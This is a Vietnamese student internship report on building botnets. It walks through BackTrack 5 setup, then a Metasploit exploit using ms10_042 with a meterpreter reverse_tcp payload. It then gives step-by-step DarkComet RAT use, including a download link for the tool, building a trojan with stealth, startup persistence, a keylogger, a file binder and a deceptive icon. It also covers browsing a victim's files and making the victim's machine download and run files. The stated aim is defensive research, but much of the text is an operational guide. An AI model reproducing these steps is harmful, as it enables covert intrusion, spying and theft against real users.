Post on 30-Jun-2015
description
Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng
GVHD: Võ Đỗ Thắng
Sinh viên thục hiện:
Nguyễn Văn Luân
TP. Hồ Chí Minh, tháng 8 năm 2014
MỤC LỤC LƠI MƠ ĐÂU ........................................................................................................................... 2
1. Sự cần thiết cua đê tai...................................................................................................... 2
2. Muc tiêu nghiên cưu........................................................................................................ 2
3. Phương phap nghiên cưu.................................................................................................. 2
4. Kết câu đê tai ................................................................................................................. 2
LỜI CẢM ƠN.............................................................................................................................. 4
NHẬN XÉT CỦA GIÁO VIÊN .......................................................................................................... 5
PHÂN 1 : GIỚI THIỆU VỀ BACKTRACK 5 ............................................................................... 6
1. Giới thiệu ...................................................................................................................... 6
2. Muc đích ....................................................................................................................... 6
3. Cai đặt ........................................................................................................................... 7
PHÂN 2: TRIỂN KHAI TRONG MÔI TRƯƠNG LAN ............................................................... 14
1. Mô phỏng mạng LAN ................................................................................................... 14
.......................................................................................................................................... 14
2. Thử nghiệm xâm nhập bằng Metasploit ........................................................................... 14
PHÂN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET ............................................................ 18
1. Giới thiệu DarkComet ................................................................................................... 18
2. Cai đặt DarkComet ....................................................................................................... 18
HƯỚNG PHÁT TRIỂN............................................................................................................ 35
KẾT LUẬN ............................................................................................................................ 36
TÀI LIỆU THAM KHẢO ......................................................................................................... 37
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 2
LƠI MƠ ĐÂU 1. Sự cần thiết cua đê tai Trong cac kiểu tân công hệ thống trên internet, tân công DDoS (Distributed Denial of
Service) la cach tân công đơn giản, hiệu quả va khó phòng chống bậc nhât. DDoS la
cach tân công dựa vao việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm
chiếm dung tai nguyên, lam cho hệ thống qua tải, không thể tiếp nhận va phuc vu cac
yêu cầu từ người dùng thực sự. Ví du điển hình la vao thang 7 năm 2013, hang loạt cac
trang bao điện tử cua Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên
Online bị tân công dẫn đến không thể truy cập được trong nhiêu tuần lễ liên tiếp. Theo
thống kê từ Abort Network, đầu năm 2014 có hơn 100 vu tân công DDoS trên
100Gbps, 5733 vu tân công đạt 20Gbps gâp hơn hai lần năm 2013.
Để có thể tạo được số lượng yêu cầu đu lớn để đanh sập hệ thống muc tiêu, cac hacker
thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hang triệu may.
Vì vậy, nghiên cưu vê cach xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu
hơn vê cach hoạt động, từ đó xây dựng cac biện phap phòng ngừa sự phat triển cua hệ
thống zombie, botnet.
2. Muc tiêu nghiên cưu Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được cac lỗ hổng bảo mật trên cac
may trong mạng, thử xâm nhập trên cac may.
Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phat tan va điểu
khiển mạng lưới botnet thông qua mạng Internet.
3. Phương phap nghiên cưu Giai đoạn 1: Sử dung ảo hóa VMware để mô phỏng môi trường mạng LAN. Cai đặt
Backtrack trên một may ảo VMware. Sau đó thực hiện thâm nhập từ may Backtrack tới
một muc tiêu.
Giai đoạn 2: Cai đặt va tạo bot trên VPS (Virtual Private Server) va phat tan trên
mạng. Sau đó thực hiện xâm nhập, kiểm soat từ xa thông qua địa chỉ IP public cua
VPS.
4. Kết câu đê tai Phần 1: Giới thiệu vê Backtrack 5
Phần 2: Triển khai trong môi trường LAN
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 3
Phần 3: Triển khai xây dựng botnet bằng DarkComet
Kêt luân
Qua thời gian học tập và nghiên cưu trên ghế nha trường cùng với sự hỗ trợ tận tình cua
Thầy cô, bạn bè va người thân đã giúp em thu thập được nhiêu kiến thưc quý bao. Đặc biệt
là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng
thú vị và bổ ích. Với mong muốn tìm hiểu vê mạng máy tính và góp phần xây dựng một
mạng máy tính thân thiện, thông minh cho mọi người sử dung.
Tuy đã có rât nhiêu cố gắng song không thể tránh những khuyết điểm, sai sót. Vì thế mong
được sự thông cảm và những ý kiến đóng góp quý bao từ Quý Thầy Cô, bạn bè, bạn đọc để
chúng em có thể ngày một hoàn thiện đê tai đã chọn một cách tốt hơn nữa. Xin chân thành
cảm ơn
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 4
LỜI CẢM ƠN
Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng
những kiến thức đã học vào thực tế công việc ở các cơ quan quản lý hành chính nhà nước và các công
việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ
thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt
quá trình thực tập tại trung tâm Athena.
Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là
sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc
tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công
nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng
em hoàn thành khóa thực tập này.
Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy
không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng
góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn để có thể nắm vững kiến thức hơn.
Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng
lời chúc sức khỏe, niềm tin để tiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho
thế hệ mai sau.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 5
XÁC NHẬN CỦA CƠ QUAN
THỦ TRƯỞNG
(ký tên, đóng dấu)
NHẬN XÉT CỦA GIÁO VIÊN
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
…...., ngày….tháng….năm 2014
CÁN BỘ HƯỚNG DẪN
(ký tên)
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 6
PHÂN 1 : GIỚI THIỆU VỀ BACKTRACK 5 1. Giới thiệu Backtrack la bản phân phối dựa trên GNU/LINUX Debian nhắm muc đích phap y kỹ
thuật số va sử dung thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ
sự hợp nhât cua hai phân phối trước đây la cạnh tranh ma tập trung vao thử nghiệm
thâm nhập: WHAX va Auditor Security Collection.
2. Muc đích Backtrack 5 có cac công cu được sử dung cho qua trình thử nghiệm xâm nhập. Cac
công cu kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau :
1. Information gathering: loại nay có chưa một số công cu có thể được sử dung
để có được thông tin liên quan đến muc tiêu DNS,định tuyến, địa chỉ
email,trang web,may chu mail…Thông tin nay được thu thập từ cac thông
tin có sẵn trên internet,ma không cần chạm vao môi trường muc tiêu.
2. Network mapping: loại nay chưa một số công cu có thể được sử dung để có
kiểm tra cac host đang tôn tại,thông tin vê OS,ưng dung được sử dung bởi
muc tiêu,va cũng lam portscanning.
3. Vulnerability identification: Trong thể loại nay, chúng ta có thể tìm thây cac
công cu để quét cac lỗ hổng (tổng hợp) va trong cac thiết bị Cisco. Nó cũng
chưa cac công cu để thực hiện va phân tích Server Message Block (SMB)
và Simple Network Management Protocol (SNMP).
4. Web application analysis: loại nay chưa cac công cu có thể được sử dung
trong theo dõi, giam sat cac ưng dung web.
5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth va nhận
dạng tần số vô tuyến (RFID).
6. Penetration: loại nay chưa cac công cu có thể được sử dung để khai thac cac
lỗ hổng tìm thây trong cac may tính muc tiêu.
7. Privilege escalation: Sau khi khai thac cac lỗ hổng va được truy cập vao cac
may tính muc tiêu, chúng ta có thể sử dung cac công cu trong loại nay để
nâng cao đặc quyên cua chúng ta cho cac đặc quyên cao nhât.
8. Maintaining access: Công cu trong loại nay sẽ có thể giúp chúng ta trong
việc duy trì quyên truy cập vao cac may tính muc tiêu. Chúng ta có thể cần
để có được những đặc quyên cao nhât trước khi cac chúng ta có thể cai đặt
công cu để duy trì quyên truy cập.
9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dung cac
công cu trong thể loại nay.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 7
10. Digital forensics: Trong loại nay, chúng ta có thể tìm thây một số công cu
có thể được sử dung để lam phân tích kỹ thuật như có được hình ảnh đĩa
cưng, câu trúc cac tập tin, va phân tích hình ảnh đĩa cưng. Để sử dung cac
công cu cung câp trong thể loại nay, chúng ta có thể chọn Start Backtrack
Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn
kết nội bộ đĩa cưng va cac tập tin trao đổi trong chế độ chỉ đọc để bảo tồn
tính toan vẹn.
11. Reverse engineering: Thể loại nay chưa cac công cu có thể được sử dung để
gỡ rối chương trình một hoặc thao rời một tập tin thực thi.
3. Cai đặt Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.
1. Live DVD
Nếu chúng ta muốn sử dung Backtrack mà không cần cài nó vào ổ cưng,
chúng ta có thể ghi tập tin ảnh ISO vao đĩa DVD, va khởi động máy tính
cua chúng ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế cua
việc sử dung Backtrack là một DVD Live là nó là rât dễ dàng để làm và
chúng ta không cần phải gây rối với câu hình máy hiện tại cua chúng ta.
Tuy nhiên, phương phap nay cũng có một số nhược điểm. Backtrack có thể
không làm việc với phần cưng, va thay đổi câu hình nao được thực hiện trên
phần cưng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoai ra, nó
là chậm, vì máy tính cần phải tải cac chương trình từ đĩa DVD.
2. Install
Cai đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để cai đặt Backtrack. Sau đó chạy
Backtrack Live DVD. Khi gặp màn hình login, ta sử dung username là root,
pass la toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ
họa cua Backtrack 5.
Để cai đặt Backtrack 5 đến đĩa cưng ta chọn tập tin có tên install.sh trên
desktop và tiến hanh cai đặt. Tuy nhiên, nếu không thể tìm thây tập tin,
chúng ta có thể sử dung ubiquity để cai đặt. Để sử dung ubiquity, ta mở
Terminal gõ ubiquity. Sau đó cửa sổ cai đặt sẽ hiển thị. Sau đó trả lời 1 số
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 8
câu hỏi như thanh phố chúng ta đang sống, keyboard layout, phân vùng ổ
đĩa cai đặt,… Sau đó tiến hanh cai đặt.
Cai đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và
sử dung đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng
được wireless trừ USB wireless.
Ta có thể có thể sử dung file VMWare được cung câp bởi BackTrack. Từ
đây chúng ta có BackTrack trên may ảo thật dễ dàng và nhanh chóng. Câu
hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT.
Để sử dung được card mạng thật, ta phải chọn Netword là Briged
Dưới đây lam một số hình ảnh khi cài BackTrack trên máy ảo VMWare
Tạo một máy ảo mới va cho đia BackTrack vao
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 9
Giao diện khởi động cua BackTrack
Gõ startx để vào chế độ đồ họa trong BackTrack
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 10
Để cai đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 11
Chọn ngôn ngữ, chọn Tiếp để tiếp tuc
Chọn múi giờ, chọn Tiếp để tiếp tuc
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 12
Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tuc
Chọn phân vùng để cài, chọn Tiếp để tiếp tuc
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 13
Nhân Cai đặt để bắt đầu cài
Qua trình cai đã bắt đầu.
Sau khi hoàn tât, chúng ta khởi động lại
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 14
PHÂN 2: TRIỂN KHAI TRONG MÔI TRƯƠNG LAN 1. Mô phỏng mạng LAN
Mô hình mạng LAN được mô phỏng:
Để chỉ định máy ảo sử dung Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn muc Network
Adapter, sau đó trong muc Network Connection, chọn tùy chọn Bridged
2. Thử nghiệm xâm nhập bằng Metasploit Trong Backtrack5r3, chúng ta sử dung công cu Metasploit để thực hiện xâm nhập.
Để khởi động giao diện Console cua Metasploit, trong Terminal, gõ lệnh
msfconsole.
Switch
PC1 PC2 PC3
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 15
Để sử dung một module nao đó, chúng ta sử dung cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms10_042
Sử dung lệnh search ms10_042 để tìm ra moudle cần dùng
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 16
use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.101
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 17
set LHOST 192.168.1.101
exploit
Sau khi exploit, Metasploit sẽ tạo một link chưa mã độc (http://192.168.1.101:80/),
chỉ cần nạn nhân click vao link thì mã độc sẽ được gửi sang máy nạn nhân và sau
đó có thể chiếm quyên máy.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 18
PHÂN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET
1. Giới thiệu DarkComet
DarkComet la một công cu quản trị từ xa (Remote Administrator Tool) miễn phí rât nổi tiếng, Tuy nhiên mình thây Dark Comet la một soft đơn giản cực kì lợi hại va nguy hiểm, với cac tính năng như:
+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý.
+ Xem cac thư muc cua may victim, ăn cắp tai liệu từ may victim. + Có thể tạo, đọc va xóa cac thư muc trong may victim.
+ Xem lén Webcam cua victim. + Nghe trộm qua microphone cua victim. + Mở website bât kì ma không cần sự đồng ý cua victim.
+ Chat với victim (cai nay fê phết, victim còn đíu tắt được cơ) + Keylog có thể xem luôn hoặc vê email.
+ Xem regedit + Có thể sử dung chưc năng ctrl + alt + del, Task Manager + Download file va chạy bình thường hoặc la ẩn ( Send sang may victim thêm vai
con trojan nữa chẳng hạn) + Khởi động cùng win con trojan đó…
Dự án DarkComet RAT đã phat hanh bản chính thưc cuối cùng là DarkComet RAT
v5.4.1 Legacy vào ngày 1/10/2012.
2. Cai đặt DarkComet Bản darkcomet dùng trong bao cao được tải từ:
http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.
Chạy DarkComet trên linux:
Tải bản DarkComet vê, giải nén vao thư muc darkcomet5.3.1RAT dùng lệnh: unzip
darkcomet5.3.1RAT.
Mở terminal, chuyển thư muc làm việc hiện hành vê darkcomet5.3.1RAT.
Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 19
Giao diện quản lí các bot cua DarkComet, chờ đợi các kết nối tới:
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to
new port(+Listen)
Điên cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Giao diện thêm socket lắng nghe
Ta có thể thêm cổng lắng nghe khác nếu muốn.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 20
Tạo trojan:
Trojan có thể được tạo từ bât kì may windows nao. Cac bước tạo trojan:
- Download DarkComet v 531
- Sau đó giải nén file DarkComet531RAT.zip
- Vao thư muc giải nén, chạy file DarkComet.exe
- Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c ua tro jan theo m ặc đ ịnh (DarkComet ->
Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -> Server module->
Full Editor)
Giao diện tùy chọn:
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 21
Các cài đặt:
+ Main settings
- Password
- server ID,
- profile name
- tùy chọn bypass tường lửa
+ Network Settings
- Cai đặt IP sẽ lắng nghe các bot và cổng lắng nghe cua server.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 22
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 23
+ Module Startup
Tùy chọn bot có khởi động cùng Windows hay không.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 24
+ Install Message
Hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy chương
trình bot hay không
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 25
+ Module Shield:
Các tùy chọn giúp bot ẩn
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 26
+ Keylogger
Tùy chọn ghi log ban phím, địa chỉ tải log.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 27
+ File Binder
Tùy chọn đính kèm file khac.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 28
+ Choose Icon
Tùy chọn một icon để tạo sự tin tưởng cho nạn nhân.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 29
+ Stub Finalization
Tùy chọn định dạng xuât file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn
cach nén file trojan va lưu cac cai đặt để sử dung lại.
Sau khi đã cai đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo
trojan.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 30
Giao diện quản lí users:
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 31
Giao diện điêu khiển user:
Demo điều khiển máy nạn nhân
Xem thông tin máy nạn nhân
Trong giao diện điêu khiển user, vao tab Comuter Information để xem thông tin máy nạn
nhân. Nếu thông tin chưa hiển thị, nhân Refresh để hiển thị.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 32
Quản lý file
Trong giao diện điêu khiển user, vào muc Files manager - > Explorer files
Ta có giao diện quản lý files trong máy nạn nhân
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 33
Cột bên trai la cac thư muc trong máy chu (server), cột bên phải la cac thư muc trong máy
nạn nhân. DarkComet có toàn quyên với máy nạn nhân nên ta có thể duyệt thư muc, thêm,
sửa, xóa các thư muc hay file trong máy nạn nhân. Ví du duyệt thư muc C:\
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 34
Xem danh sách các port đang mở trên máy nạn nhân
Trong giao diện quản lý user, vào Network Functions -> Active ports.
Trên bảng điêu khiển, ta thây được cac process nao đang dùng port nao, trạng thái port.
Đồng thời ta còn có thể tắt những process đang chạy bằng cách nhâp chuột phải vào
process muốn tắt và chọn Kill process ID.
Điêu khiển máy nạn nhân download và thực thi một file
Từ giao diện điêu khiển user, vào Network Funtions -> Url download.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 35
Chọn nơi lưu trữ file tại ô Destination Path
Chọn đường dẫn download tại ô Download from.
Tùy chọn file có thực thi ngay sau khi download thành công bằng cách tick vào ô Execute
the file after download.
Sau khi thiết lập xong các tùy chọn, nhân Add để thêm vao danh sach đợi lệnh, nhân
Launch Process để thực thi lệnh.
Ví du: download và mở một file html tại http://webdesignerbk10.tk/index.html, lưu file tại
Desktop. Kết quả: trên Desktop máy nạn nhân có file index.html và trình duyệt mặc định
cua máy nạn nhân mở file này lên.
HƯỚNG PHÁT TRIỂN Công nghệ thông tin la nganh đang phat triển rât mạnh ở Việt Nam. Theo số liệu từ “Sach
trắng Công nghệ thông tin – Truyên thông 2013”, cả nước có trên 1300 trang thông tin
điện tử, 420 trang mạng xã hội được câp phép. Đi cùng với sự phát triển này là số lượng
các máy chu (server) phuc vu các trang mạng, may tính để bàn (PC), máy tính xách tay
(laptop) cũng tăng lên rât nhanh. Nếu không có các biện pháp bảo mật nghiêm ngặt thì đây
la môi trường rât thuận lợi cho sự phát triển cua botnet, zombie.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 36
Để tiếp tuc phát triển va đap ưng yêu cầu thực tế, đê tài này cần nghiêng cưu mở rộng theo
cac hướng:
Cac phương phap bypass cac antivirus hiện tại
Các loại bot phổ biến và nguy hiểm khác
Các cách phát tán botnet
Các cách khai thác botnet
Cac phương phap hiệu quả để phòng chống trở thành zombie, botnet
KẾT LUẬN Từ khi ra đời đến nay, mạng internet luôn tiêm ẩn nguy cac nguy cơ bảo mật. Tìm hiểu vê
mạng lưới zombie, botnet rât có ích cho người dùng phổ thông, giúp hạn chế nguy cơ bị
biến thanh botnet. Đê tai nay cang có ít cho người quản trị hệ thống, giúp hiểu rõ cơ chế
hoạt động cua mạng lưới zombie, botnet, từ đó đê ra cac biện phap phòng ngừa thích hợp.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng Trang 37
TÀI LIỆU THAM KHẢO 3. Trung tâm đao tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU
HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ
HỔNG MẠNG TẠI TRUNG TÂM ATHENA”
4. Trung tâm đao tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng
– Bí quyết và giải pháp”
5. Diễn đan Athena, http://athena.edu.vn/forum/forum.php
6. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a-
capital-v